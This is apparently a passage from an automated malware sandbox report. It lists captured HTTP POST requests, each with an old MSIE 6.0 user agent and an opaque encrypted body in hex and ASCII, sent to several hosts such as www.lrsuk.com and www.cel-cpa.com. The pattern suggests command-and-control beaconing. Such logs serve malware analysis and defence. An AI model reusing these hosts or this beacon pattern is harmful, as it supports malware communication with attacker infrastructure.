50 50 37 67 38 59 74 45 33 69 56 34 65 32 39 68 5a 45 69 4e 70 72 2b 65 6d 53 6a 58 73 59 55 46 42 4d 49 4d 4b 77 6d 4a 58 39 59 76 51 31 76 56 77 6f 50 42 6e 41 58 61 5a 73 46 4e 59 79 44 68 79 61 6e 71 76 62 55 55 42 35 64 35 46 72 35 46 44 6f 46 32 56 45 6e 30 51 6b 4c 71 4c 74 48 58 6b 55 2f 45 56 37 47 37 64 66 4f 72 6e 57 56 38 61 79 38 75 4d 35 70 30 30 61 50 39 31 67 41 59 6f 71 72 54 52 67 30 76 54 74 6a 65 69 41 38 4e 62 6c 73 49 6e 59 47 45 42 47 75 74 61 62 53 6a 69 4f 52 35 6f 61 4b 39 43 6c 33 68 70 56 79 48 6a 76 34 46 50 64 72 44 4c 6b 51 51 4d 53 56 4d 6c 70 33 59 56 63 48 41 2f 4b 6f 73 59 54 56 73 54 79 64 65 34 38 4a 65 42 4e 66 74 6c 66 42 5a 50 38 69 76 62 65 4d 55 71 49 59 6b 4d 70 6b 4e 51 6c 63 55 6e 73 34 78 45 47 53 33 57 38 59 57 6d 69 67 4a 4b 73 59 33 4f 41 56 4a 58 53 55 36 59 79 75 48 74 6c 51 74 70 42 51 65 50 5a 74 63 78 36 6f 34 64 4b 54 30 6a 51 66 66 4d 49 67 76 68 51 33 2b 4a 51 4d 49 49 74 58 36 6c 57 34 65 6d 69 65 66 50 6b 41 51 6b 74 36 69 52 79 38 65 36 53 6e 6f 7a 43 50 7a 65 46 76 51 62 4e 2b 63 54 53 31 51 77 77 54 38 70 38 39 49 34 Data Ascii: RuxjE5IKlWUjSW1pRah4z5WZcFTiuZeV5qnw0T4lQey5lRoNm/hRU4NaibU4Htz5b8TTRgYqho5QHNJABxS7ydAAuylU3QpDbQknGM9WbLuDwJT4M8hxENDD0DguVD+eVzD9XyMPGTyTu0R+0fW/5lnOCXh2l6L5+S6yZF6QRSW8e400sJNpU27yb1M0TmDtIuJXCmwcZgRx9T4AQL9r6Wt19Jw3CF0PP7g8YtE3iV4e29hZEiNpr+emSjXsYUFBMIMKwmJX9YvQ1vVwoPBnAXaZsFNYyDhyanqvbUUB5d5Fr5FDoF2VEn0QkLqLtHXkU/EV7G7dfOrnWV8ay8uM5p00aP91gAYoqrTRg0vTtjeiA8NblsInYGEBGutabSjiOR5oaK9Cl3hpVyHjv4FPdrDLkQQMSVMlp3YVcHA/KosYTVsTyde48JeBNftlfBZP8ivbeMUqIYkMpkNQlcUns4xEGS3W8YWmigJKsY3OAVJXSU6YyuHtlQtpBQePZtcx6o4dKT0jQffMIgvhQ3+JQMIItX6lW4emiefPkAQkt6iRy8e6SnozCPzeFvQbN+cTS1QwwT8p89I4
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 72 53 4d 71 30 32 32 6b 69 6d 58 51 4d 42 36 4b 5a 4c 71 68 73 43 62 6a 78 65 56 62 68 50 2b 37 38 57 74 6a 31 55 68 75 73 34 61 59 4b 32 4f 79 33 59 65 4a 72 54 49 66 6c 55 6b 41 4b 47 2b 6c 33 6d 69 38 30 34 4a 67 75 6e 6e 42 34 78 6c 52 65 61 47 74 30 74 6b 4d 6b 48 45 61 43 34 34 4c 52 45 5a 39 34 72 34 54 32 69 51 4d 77 50 32 62 53 35 42 38 55 68 4f 42 35 65 71 73 50 67 36 46 67 63 6b 4d 61 74 47 4f 36 4e 59 6b 72 63 32 4c 7a 2b 59 31 34 4a 51 55 4f 6b 45 6a 49 68 41 70 33 32 4d 6c 45 45 34 37 44 38 4e 70 6c 71 78 49 4d 43 36 33 51 5a 51 74 7a 5a 62 4a 65 61 39 7a 6f 55 36 4a 6b 66 54 38 31 66 78 73 48 64 64 65 68 43 62 4f 6b 4a 52 71 4b 44 42 5a 36 4f 43 57 51 76 63 51 67 72 55 4f 6f 48 4d 65 64 71 41 46 41 43 73 41 49 70 4a 35 4e 68 62 77 4f 69 4e 4b 47 35 66 53 7a 6d 45 4f 4a 30 49 65 33 33 35 59 78 78 69 70 78 73 31 49 4f 6f 68 4f 35 68 49 78 64 70 45 56 7a 4e 62 42 75 69 64 41 57 4c 46 69 63 30 62 4f 55 4b 53 31 30 42 5a 44 6f 44 39 61 55 37 43 44 6b 52 47 69 72 45 7a 43 34 41 6a 35 4b 35 41 6c 4b 53 2f 38 55 79 6f 53 73 36 7a 64 67 75 4b 32 4b 51 41 6e 36 64 4a 4d 42 48 78 66 42 73 30 77 51 6e 32 35 76 66 56 75 46 74 42 78 66 56 4d 57 79 30 50 37 62 41 4c 5a 46 76 75 59 49 54 7a 30 58 67 74 59 6a 6a 78 50 61 4d 71 69 5a 6e 31 69 4b 72 75 49 2b 72 4b 4a 74 31 48 58 43 41 4d 37 73 52 53 48 6b 31 30 4b 4b 6f 56 55 68 4e 63 77 71 2b 41 4a 52 41 69 32 30 72 58 73 50 64 47 56 47 71 75 30 42 6b 44 4e 70 71 52 54 49 70 36 4d 39 66 48 4d 45 78 72 4a 4f 38 34 6f 6c 58 38 61 55 55 76 47 43 37 4e 5a 7a 4c 6a 70 58 57 36 4a 2f 52 6a 63 78 67 36 58 70 4e 79 70 62 31 42 54 2b 77 51 78 4f 71 2b 47 6a 78 68 76 50 4a 2f 50 6f 6b 4f 46 6c 49 34 57 6c 66 70 68 50 31 74 58 46 67 62 62 61 35 58 35 36 49 58 48 Data Ascii: rSMq022kimXQMB6KZLqhsCbjxeVbhP+78Wtj1Uhus4aYK2Oy3YeJrTIflUkAKG+l3mi804JgunnB4xlReaGt0tkMkHEaC44LREZ94r4T2iQMwP2bS5B8UhOB5eqsPg6FgckMatGO6NYkrc2Lz+Y14JQUOkEjIhAp32MlEE47D8NplqxIMC63QZQtzZbJea9zoU6JkfT81fxsHddehCbOkJRqKDBZ6OCWQvcQgrUOoHMedqAFACsAIpJ5NhbwOiNKG5fSzmEOJ0Ie335Yxxipxs1IOohO5hIxdpEVzNbBuidAWLFic0bOUKS10BZDoD9aU7CDkRGirEzC4Aj5K5AlKS/8UyoSs6zdguK2KQAn6dJMBHxfBs0wQn25vfVuFtBxfVMWy0P7bALZFvuYITz0XgtYjjxPaMqiZn1iKruI+rKJt1HXCAM7sRSHk10KKoVUhNcwq+AJRAi20rXsPdGVGqu0BkDNpqRTIp6M9fHMExrJO84olX8aUUvGC7NZzLjpXW6J/Rjcxg6XpNypb1BT+wQxOq+GjxhvPJ/PokOFlI4WlfphP1tXFgbba5X56IXH
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 33 67 76 46 46 56 6b 65 6c 57 58 45 48 48 7a 69 61 50 50 4a 78 66 49 76 49 5a 43 33 63 69 68 44 6e 58 62 69 4f 32 2b 69 4f 6f 31 41 78 37 7a 6a 32 64 74 34 70 6d 6e 71 6e 55 4c 4e 73 6e 6a 56 63 35 32 31 46 2f 50 37 4c 79 76 47 46 6a 2b 62 33 71 57 74 75 39 79 38 6a 72 38 36 45 4f 74 72 4c 77 77 52 41 4f 55 55 37 30 6e 61 4d 45 44 6e 49 61 4e 7a 6f 59 51 61 76 6b 5a 58 2b 32 6b 35 46 73 75 49 4b 6a 70 51 68 43 57 69 2b 35 38 6b 6a 74 46 43 66 47 56 61 4b 54 4e 70 36 50 63 6f 5a 77 75 36 56 33 55 59 70 7a 71 51 61 5a 66 33 4c 56 6c 77 69 30 54 69 31 42 73 73 47 4c 38 61 36 7a 41 32 4d 75 33 79 70 57 4b 39 67 4a 56 73 45 4a 62 53 2b 2f 41 4e 54 66 52 31 56 55 54 30 44 2b 31 66 37 41 45 30 6f 33 43 37 33 59 62 68 2f 61 6f 38 7a 66 4a 6b 42 75 33 62 70 52 61 39 69 45 59 76 48 58 75 6d 59 57 4e 6c 47 68 32 36 33 71 38 35 47 47 75 6e 6c 6b 55 6d 2f 30 70 67 64 50 58 2b 74 70 36 63 76 32 2f 64 73 34 52 4a 66 53 50 38 6f 77 69 54 65 53 66 52 73 58 75 50 58 47 6d 2f 75 48 35 62 75 6b 7a 2b 4d 31 33 33 6d 6b 78 42 53 78 32 65 6f 39 61 63 61 67 41 67 44 52 58 49 67 2b 74 36 62 2b 36 6c 6e 4a 39 65 6f 69 32 78 63 50 48 72 52 54 53 69 66 30 6b 50 33 70 67 68 65 64 38 37 30 48 34 63 39 46 45 52 66 2b 32 63 4a 70 65 45 39 78 52 57 33 68 68 47 57 71 7a 36 78 69 52 43 5a 44 64 56 34 38 63 36 6e 72 74 33 49 34 4f 30 37 4b 30 41 6e 39 53 4c 59 6e 59 74 35 51 61 76 63 64 62 58 47 4b 78 4d 4f 34 64 65 69 6e 33 6d 68 41 2b 55 61 68 4e 54 65 41 72 38 76 77 64 77 4f 46 7a 55 59 72 69 31 52 6d 36 6e 58 67 54 4b 4a 63 37 58 61 75 6a 50 45 61 76 2b 59 74 5a 33 74 78 38 42 67 72 66 35 69 4a 4b 4c 74 2b 68 2b 5a 77 6b 52 64 63 46 53 46 47 2f 4d 50 44 38 5a 2f 45 6b 4f 6a 2f 38 3d Data Ascii: 3gvFFVkelWXEHHziaPPJxfIvIZC3cihDnXbiO2+iOo1Ax7zj2dt4pmnqnULNsnjVc521F/P7LyvGFj+b3qWtu9y8jr86EOtrLwwRAOUU70naMEDnIaNzoYQavkZX+2k5FsuIKjpQhCWi+58kjtFCfGVaKTNp6PcoZwu6V3UYpzqQaZf3LVlwi0Ti1BssGL8a6zA2Mu3ypWK9gJVsEJbS+/ANTfR1VUT0D+1f7AE0o3C73Ybh/ao8zfJkBu3bpRa9iEYvHXumYWNlGh263q85GGunlkUm/0pgdPX+tp6cv2/ds4RJfSP8owiTeSfRsXuPXGm/uH5bukz+M133mkxBSx2eo9acagAgDRXIg+t6b+6lnJ9eoi2xcPHrRTSif0kP3pghed870H4c9FERf+2cJpeE9xRW3hhGWqz6xiRCZDdV48c6nrt3I4O07K0An9SLYnYt5QavcdbXGKxMO4dein3mhA+UahNTeAr8vwdwOFzUYri1Rm6nXgTKJc7XaujPEav+YtZ3tx8Bgrf5iJKLt+h+ZwkRdcFSFG/MPD8Z/EkOj/8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 72 6c 6e 61 45 51 5a 4f 6e 57 58 53 76 4e 57 45 49 55 30 59 73 53 6e 52 67 6e 39 6d 39 42 31 31 6d 6b 70 50 51 51 78 2b 46 44 37 46 6a 4d 35 67 64 65 42 6d 42 73 35 58 41 34 4c 51 4f 73 4c 31 6a 6c 5a 4a 76 4f 46 42 43 63 6a 72 30 62 65 50 76 54 58 61 2b 37 61 63 38 52 64 46 6e 36 31 37 32 6e 45 37 50 4c 6f 62 44 52 4e 4e 65 51 49 38 55 37 5a 67 39 48 2f 46 79 42 2b 67 61 33 76 61 4c 6f 74 4f 76 39 46 58 77 58 6e 2f 77 30 41 32 51 62 6a 4b 70 62 37 51 72 65 66 78 41 5a 37 2b 52 79 53 7a 5a 47 65 65 32 55 53 37 44 69 62 49 32 62 6e 6a 73 38 53 51 42 49 66 72 66 75 79 67 53 72 4b 41 56 41 2b 70 38 67 38 34 4d 48 6d 54 59 59 41 63 39 46 75 36 46 4d 34 30 53 33 67 6c 32 55 51 46 49 56 35 4e 50 48 48 63 32 2b 34 51 68 48 36 31 53 69 43 45 6a 36 6d 36 69 72 37 50 75 75 6d 72 56 75 47 64 69 4d 51 57 4a 6b 39 6a 67 55 43 39 6b 64 4e 66 49 6c 76 62 57 59 4c 66 30 53 7a 58 72 55 66 6a 56 46 56 43 48 64 6f 76 2b 4a 77 6f 4d 43 65 75 58 67 65 39 42 69 79 64 7a 76 71 48 78 74 67 79 37 6f 78 6c 37 2b 48 4a 51 39 2f 55 58 6c 76 6d 42 6f 31 4f 39 7a 71 36 6a 41 58 35 51 42 6a 36 54 67 49 78 37 68 38 62 38 5a 62 6e 6c 51 4e 77 4d 2b 6a 6b 64 39 71 58 66 66 75 70 7a 62 76 74 63 59 30 54 41 6c 70 63 5a 46 4b 55 72 36 4c 36 41 52 4b 49 68 4e 38 75 54 2b 4a 4a 51 34 2f 51 4c 4b 56 35 79 57 4b 36 6e 66 73 41 4a 45 4c 64 37 75 6b 48 59 6f 6b 63 44 76 31 73 4a 58 78 54 7a 42 49 50 4d 71 50 77 75 36 47 30 62 67 6e 6d 63 38 68 67 4c 56 74 5a 2f 6b 78 53 50 32 46 76 71 36 6b 78 43 34 36 2f 4e 51 6e 38 53 44 78 47 54 37 32 4d 59 51 31 46 74 52 36 75 78 6b 43 57 54 4c 4c 33 35 6e 6a 30 49 39 31 62 50 6f 4d 48 4a 59 4a 33 64 69 55 43 58 35 4e 61 4a 46 35 58 4a 37 72 2b 2f 4b 6f 45 58 41 3d 3d Data Ascii: rlnaEQZOnWXSvNWEIU0YsSnRgn9m9B11mkpPQQx+FD7FjM5gdeBmBs5XA4LQOsL1jlZJvOFBCcjr0bePvTXa+7ac8RdFn6172nE7PLobDRNNeQI8U7Zg9H/FyB+ga3vaLotOv9FXwXn/w0A2QbjKpb7QrefxAZ7+RySzZGee2US7DibI2bnjs8SQBIfrfuygSrKAVA+p8g84MHmTYYAc9Fu6FM40S3gl2UQFIV5NPHHc2+4QhH61SiCEj6m6ir7PuumrVuGdiMQWJk9jgUC9kdNfIlvbWYLf0SzXrUfjVFVCHdov+JwoMCeuXge9BiydzvqHxtgy7oxl7+HJQ9/UXlvmBo1O9zq6jAX5QBj6TgIx7h8b8ZbnlQNwM+jkd9qXffupzbvtcY0TAlpcZFKUr6L6ARKIhN8uT+JJQ4/QLKV5yWK6nfsAJELd7ukHYokcDv1sJXxTzBIPMqPwu6G0bgnmc8hgLVtZ/kxSP2Fvq6kxC46/NQn8SDxGT72MYQ1FtR6uxkCWTLL35nj0I91bPoMHJYJ3diUCX5NaJF5XJ7r+/KoEXA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 54 69 73 72 76 2b 62 75 6f 6d 55 69 58 4e 4e 2f 67 62 6c 61 70 51 6d 46 43 74 72 47 6c 6f 79 77 65 6f 6d 4b 51 68 76 30 4c 74 51 70 61 74 46 6a 41 47 38 50 76 42 30 56 50 44 49 44 4d 74 33 67 50 67 50 6f 7a 55 6e 7a 51 71 31 51 55 55 56 6c 76 64 4f 6b 4c 75 6a 67 4d 74 71 78 4e 31 5a 46 70 56 45 73 61 61 4f 4b 62 33 70 67 7a 7a 54 4e 74 2b 32 61 4b 51 67 55 4e 31 4d 6b 6e 6c 41 66 69 46 4c 43 35 4a 47 62 32 77 63 47 53 7a 58 54 73 2b 51 62 52 36 32 65 58 63 5a 6d 76 53 30 49 67 73 55 37 57 59 53 34 59 4a 52 53 30 76 6c 38 62 49 79 4d 46 68 42 76 49 6c 62 55 33 67 32 31 2b 5a 4d 68 41 64 45 71 4b 71 56 33 54 49 67 4c 73 58 38 6a 68 6d 55 76 71 66 49 61 44 76 61 4c 32 44 39 67 63 36 33 75 52 46 70 58 67 43 74 49 34 39 36 38 48 58 50 67 79 2f 48 75 68 69 61 65 54 71 65 64 6a 32 33 50 2f 37 57 58 38 34 41 39 42 41 2f 54 79 4e 4d 68 74 64 62 49 57 4a 61 71 2f 6c 63 72 4b 49 75 74 56 7a 6a 49 72 4a 32 57 6b 61 79 6c 48 57 2f 58 6b 6b 72 4d 69 68 39 37 2f 42 2f 73 6f 75 6e 72 35 6d 70 77 6c 41 43 68 70 4a 55 52 47 44 68 6d 6a 33 56 77 43 67 32 74 48 2b 4c 74 38 4d 66 6d 5a 33 6e 50 4a 69 64 56 36 4c 56 6c 69 34 69 61 39 5a 63 53 34 78 35 49 68 53 6f 6a 6b 38 76 53 32 39 39 42 49 44 68 4a 4d 77 74 68 6b 51 79 5a 69 44 45 42 59 44 31 58 35 6e 79 77 54 66 59 76 76 6d 4f 76 67 54 68 4a 36 43 2f 72 5a 31 4a 79 56 4e 6b 34 35 76 78 30 4e 78 70 59 41 36 57 64 43 39 62 58 34 63 71 7a 4e 6e 53 69 4c 35 64 39 63 34 38 76 51 79 6e 73 5a 75 71 76 63 33 53 4f 34 79 71 67 73 4a 6a 68 77 49 69 71 62 46 6f 34 34 7a 73 32 43 6a 5a 33 41 4b 2b 58 5a 44 43 30 63 5a 42 6c 38 46 56 72 79 4d 45 35 6a 37 4f 64 69 75 5a 64 38 59 44 6a 6d 41 6f 37 75 50 78 5a 34 71 53 66 2b 52 41 41 62 70 64 6d 43 75 76 79 41 74 30 3d Data Ascii: Tisrv+buomUiXNN/gblapQmFCtrGloyweomKQhv0LtQpatFjAG8PvB0VPDIDMt3gPgPozUnzQq1QUUVlvdOkLujgMtqxN1ZFpVEsaaOKb3pgzzTNt+2aKQgUN1MknlAfiFLC5JGb2wcGSzXTs+QbR62eXcZmvS0IgsU7WYS4YJRS0vl8bIyMFhBvIlbU3g21+ZMhAdEqKqV3TIgLsX8jhmUvqfIaDvaL2D9gc63uRFpXgCtI4968HXPgy/HuhiaeTqedj23P/7WX84A9BA/TyNMhtdbIWJaq/lcrKIutVzjIrJ2WkaylHW/XkkrMih97/B/sounr5mpwlAChpJURGDhmj3VwCg2tH+Lt8MfmZ3nPJidV6LVli4ia9ZcS4x5IhSojk8vS299BIDhJMwthkQyZiDEBYD1X5nywTfYvvmOvgThJ6C/rZ1JyVNk45vx0NxpYA6WdC9bX4cqzNnSiL5d9c48vQynsZuqvc3SO4yqgsJjhwIiqbFo44zs2CjZ3AK+XZDC0cZBl8FVryME5j7OdiuZd8YDjmAo7uPxZ4qSf+RAAbpdmCuvyAt0=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 58 46 45 73 46 42 45 52 6c 57 55 2b 4c 31 68 2b 73 4a 64 32 64 47 71 4c 6b 69 76 50 35 78 4e 42 31 66 44 58 59 4f 47 68 4f 41 56 47 47 6a 41 66 69 42 79 65 62 78 65 45 34 65 35 69 5a 54 32 76 71 49 50 6f 6f 33 61 4d 37 34 67 5a 44 62 75 4c 4e 45 56 69 57 47 4e 39 75 74 72 67 6a 4f 2b 50 6b 7a 73 77 33 76 4d 30 78 31 7a 75 4d 77 76 39 39 6a 6a 56 7a 76 4d 42 44 6f 67 34 2b 31 45 77 49 74 52 75 2b 36 76 2b 7a 67 2b 49 4a 4f 55 76 49 67 69 73 38 64 74 32 6d 4e 44 4d 51 6b 75 30 66 51 6b 61 43 61 78 2b 42 45 75 6b 42 49 6f 64 6f 35 62 46 2f 39 51 38 31 36 58 46 78 30 63 43 63 55 5a 66 6d 6d 6d 71 6f 70 48 5a 51 54 65 50 57 49 6c 78 64 2b 50 39 47 6f 30 4c 63 4c 65 35 6c 7a 31 4a 30 79 61 65 57 4a 64 7a 6c 6c 55 52 42 68 72 4c 55 35 72 58 77 52 41 50 46 37 54 49 56 57 77 36 47 48 59 77 68 4b 52 55 38 51 36 71 45 66 58 54 36 2b 6b 6e 43 4e 66 36 57 68 2f 39 76 6a 76 31 6b 4a 74 63 55 52 4e 46 78 77 41 34 4f 37 45 58 71 79 50 2f 79 79 56 4b 74 4b 41 73 2f 61 63 55 79 52 4a 42 63 72 70 48 74 74 45 68 71 73 68 44 52 41 77 63 50 6a 41 41 5a 51 63 7a 36 39 6a 36 42 31 44 69 61 6a 58 43 47 77 2b 7a 69 45 61 74 59 42 6d 49 35 6a 4d 4a 59 7a 6b 4f 75 63 62 70 76 35 6a 37 32 50 6f 51 59 63 64 67 63 35 44 50 2b 50 36 77 47 78 38 77 31 6d 35 32 7a 59 49 6f 4b 57 39 4e 76 45 62 77 37 57 56 72 59 6f 2b 32 62 58 38 49 4f 35 39 67 67 2f 50 72 2f 47 30 41 46 44 62 73 6b 53 30 77 37 49 4f 6a 49 65 47 45 2f 6b 2b 67 72 41 74 6f 55 64 7a 47 68 57 4a 34 4b 61 69 57 64 34 65 5a 76 59 53 54 41 61 68 6d 55 77 33 58 6e 4b 55 32 47 41 36 54 66 6b 66 53 6f 2b 39 55 4b 78 35 59 70 4b 76 74 63 57 44 4c 35 4d 48 66 4c 6e 33 4a 74 51 34 44 74 53 4b 34 75 6c 52 53 65 68 62 59 32 75 41 67 64 46 7a 6d 64 72 6d 46 4f 39 4d 52 79 43 2f 4a Data Ascii: XFEsFBERlWU+L1h+sJd2dGqLkivP5xNB1fDXYOGhOAVGGjAfiByebxeE4e5iZT2vqIPoo3aM74gZDbuLNEViWGN9utrgjO+Pkzsw3vM0x1zuMwv99jjVzvMBDog4+1EwItRu+6v+zg+IJOUvIgis8dt2mNDMQku0fQkaCax+BEukBIodo5bF/9Q816XFx0cCcUZfmmmqopHZQTePWIlxd+P9Go0LcLe5lz1J0yaeWJdzllURBhrLU5rXwRAPF7TIVWw6GHYwhKRU8Q6qEfXT6+knCNf6Wh/9vjv1kJtcURNFxwA4O7EXqyP/yyVKtKAs/acUyRJBcrpHttEhqshDRAwcPjAAZQcz69j6B1DiajXCGw+ziEatYBmI5jMJYzkOucbpv5j72PoQYcdgc5DP+P6wGx8w1m52zYIoKW9NvEbw7WVrYo+2bX8IO59gg/Pr/G0AFDbskS0w7IOjIeGE/k+grAtoUdzGhWJ4KaiWd4eZvYSTAahmUw3XnKU2GA6TfkfSo+9UKx5YpKvtcWDL5MHfLn3JtQ4DtSK4ulRSehbY2uAgdFzmdrmFO9MRyC/J
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 72 6c 6e 61 45 51 5a 4f 6e 57 58 53 76 4e 57 45 49 55 30 59 73 53 6e 52 67 6e 39 6d 39 42 31 31 6d 6b 70 50 51 51 78 2b 46 44 37 46 6a 4d 35 67 64 65 42 6d 42 73 35 58 41 34 4c 51 4f 73 4c 31 6a 6c 5a 4a 76 4f 46 42 43 63 6a 72 30 62 65 50 76 54 58 61 2b 37 61 63 38 52 64 46 6e 36 31 37 32 6e 45 37 50 4c 6f 62 44 52 4e 4e 65 51 49 38 55 37 5a 67 39 48 2f 46 79 42 2b 67 61 33 76 61 4c 6f 74 4f 76 39 46 58 77 58 6e 2f 77 30 41 32 51 62 6a 4b 70 62 37 51 72 65 66 78 41 5a 37 2b 52 79 53 7a 5a 47 65 65 32 55 53 37 44 69 62 49 32 62 6e 6a 73 38 53 51 42 49 66 72 66 75 79 67 53 72 4b 41 56 41 2b 70 38 67 38 34 4d 48 6d 54 59 59 41 63 39 46 75 36 46 4d 34 30 53 33 67 6c 32 55 51 46 49 56 35 4e 50 48 48 63 32 2b 34 51 68 48 36 31 53 69 43 45 6a 36 6d 36 69 72 37 50 75 75 6d 72 56 75 47 64 69 4d 51 57 4a 6b 39 6a 67 55 43 39 6b 64 4e 66 49 6c 76 62 57 59 4c 66 30 53 7a 58 72 55 66 6a 56 46 56 43 48 64 6f 76 2b 4a 77 6f 4d 43 65 75 58 67 65 39 42 69 79 64 7a 76 71 48 78 74 67 79 37 6f 78 6c 37 2b 48 4a 51 39 2f 55 58 6c 76 6d 42 6f 31 4f 39 7a 71 36 6a 41 58 35 51 42 6a 36 54 67 49 78 37 68 38 62 38 5a 62 6e 6c 51 4e 77 4d 2b 6a 6b 64 39 71 58 66 66 75 70 7a 62 76 74 63 59 30 54 41 6c 70 63 5a 46 4b 55 72 36 4c 36 41 52 4b 49 68 4e 38 75 54 2b 4a 4a 51 34 2f 51 4c 4b 56 35 79 57 4b 36 6e 66 73 41 4a 45 4c 64 37 75 6b 48 59 6f 6b 63 44 76 31 73 4a 58 78 54 7a 42 49 50 4d 71 50 77 75 36 47 30 62 67 6e 6d 63 38 68 67 4c 56 74 5a 2f 6b 78 53 50 32 46 76 71 36 6b 78 43 34 36 2f 4e 51 6e 38 53 44 78 47 54 37 32 4d 59 51 31 46 74 52 36 75 78 6b 43 57 54 4c 4c 33 35 6e 6a 30 49 39 31 62 50 6f 4d 48 4a 59 4a 33 64 69 55 43 58 35 4e 61 4a 46 35 58 4a 37 72 2b 2f 4b 6f 45 58 41 3d 3d Data Ascii: rlnaEQZOnWXSvNWEIU0YsSnRgn9m9B11mkpPQQx+FD7FjM5gdeBmBs5XA4LQOsL1jlZJvOFBCcjr0bePvTXa+7ac8RdFn6172nE7PLobDRNNeQI8U7Zg9H/FyB+ga3vaLotOv9FXwXn/w0A2QbjKpb7QrefxAZ7+RySzZGee2US7DibI2bnjs8SQBIfrfuygSrKAVA+p8g84MHmTYYAc9Fu6FM40S3gl2UQFIV5NPHHc2+4QhH61SiCEj6m6ir7PuumrVuGdiMQWJk9jgUC9kdNfIlvbWYLf0SzXrUfjVFVCHdov+JwoMCeuXge9BiydzvqHxtgy7oxl7+HJQ9/UXlvmBo1O9zq6jAX5QBj6TgIx7h8b8ZbnlQNwM+jkd9qXffupzbvtcY0TAlpcZFKUr6L6ARKIhN8uT+JJQ4/QLKV5yWK6nfsAJELd7ukHYokcDv1sJXxTzBIPMqPwu6G0bgnmc8hgLVtZ/kxSP2Fvq6kxC46/NQn8SDxGT72MYQ1FtR6uxkCWTLL35nj0I91bPoMHJYJ3diUCX5NaJF5XJ7r+/KoEXA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 52 75 78 6a 45 35 49 4b 6c 57 55 6a 53 57 31 70 52 61 68 34 7a 35 57 5a 63 46 54 69 75 5a 65 56 35 71 6e 77 30 54 34 6c 51 65 79 35 6c 52 6f 4e 6d 2f 68 52 55 34 4e 61 69 62 55 34 48 74 7a 35 62 38 54 54 52 67 59 71 68 6f 35 51 48 4e 4a 41 42 78 53 37 79 64 41 41 75 79 6c 55 33 51 70 44 62 51 6b 6e 47 4d 39 57 62 4c 75 44 77 4a 54 34 4d 38 68 78 45 4e 44 44 30 44 67 75 56 44 2b 65 56 7a 44 39 58 79 4d 50 47 54 79 54 75 30 52 2b 30 66 57 2f 35 6c 6e 4f 43 58 68 32 6c 36 4c 35 2b 53 36 79 5a 46 36 51 52 53 57 38 65 34 30 30 73 4a 4e 70 55 32 37 79 62 31 4d 30 54 6d 44 74 49 75 4a 58 43 6d 77 63 5a 67 52 78 39 54 34 41 51 4c 39 72 36 57 74 31 39 4a 77 33 43 46 30 50 50 37 67 38 59 74 45 33 69 56 34 65 32 39 68 5a 45 69 4e 70 72 2b 65 6d 53 6a 58 73 59 55 46 42 4d 49 4d 4b 77 6d 4a 58 39 59 76 51 31 76 56 77 6f 50 42 6e 41 58 61 5a 73 46 4e 59 79 44 68 79 61 6e 71 76 62 55 55 42 35 64 35 46 72 35 46 44 6f 46 32 56 45 6e 30 51 6b 4c 71 4c 74 48 58 6b 55 2f 45 56 37 47 37 64 66 4f 72 6e 57 56 38 61 79 38 75 4d 35 70 30 30 61 50 39 31 67 41 59 6f 71 72 54 52 67 30 76 54 74 6a 65 69 41 38 4e 62 6c 73 49 6e 59 47 45 42 47 75 74 61 62 53 6a 69 4f 52 35 6f 61 4b 39 43 6c 33 68 70 56 79 48 6a 76 34 46 50 64 72 44 4c 6b 51 51 4d 53 56 4d 6c 70 33 59 56 63 48 41 2f 4b 6f 73 59 54 56 73 54 79 64 65 34 38 4a 65 42 4e 66 74 6c 66 42 5a 50 38 69 76 62 65 4d 55 71 49 59 6b 4d 70 6b 4e 51 6c 63 55 6e 73 34 78 45 47 53 33 57 38 59 57 6d 69 67 4a 4b 73 59 33 4f 41 56 4a 58 53 55 36 59 79 75 48 74 6c 51 74 70 42 51 65 50 5a 74 63 78 36 6f 34 64 4b 54 30 6a 51 66 66 4d 49 67 76 68 51 33 2b 4a 51 4d 49 49 74 58 36 6c 57 34 65 6d 69 65 66 50 6b 41 51 6b 74 36 69 52 79 38 65 36 53 6e 6f 7a 43 50 7a 65 46 76 51 62 4e 2b 63 54 53 31 51 77 77 54 38 70 38 39 49 34 Data Ascii: 